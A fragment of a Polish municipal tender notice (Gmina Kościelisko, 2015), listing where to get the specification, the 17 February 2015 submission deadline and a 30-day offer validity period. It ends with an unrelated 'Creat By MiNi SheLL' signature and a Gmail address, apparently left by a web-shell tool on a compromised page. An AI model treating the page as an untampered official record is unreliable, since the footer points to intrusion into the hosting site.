<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.koscielisko.com.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Kościelisko ul. Strzelców Podhalańskich 44 34-511 Kościelisko pok. nr 11.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.02.2015 godzina 10:00, miejsce: Urząd Gminy Kościelisko ul. Strzelców Podhalańskich 44 34-511 Kościelisko pok. nr 7..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com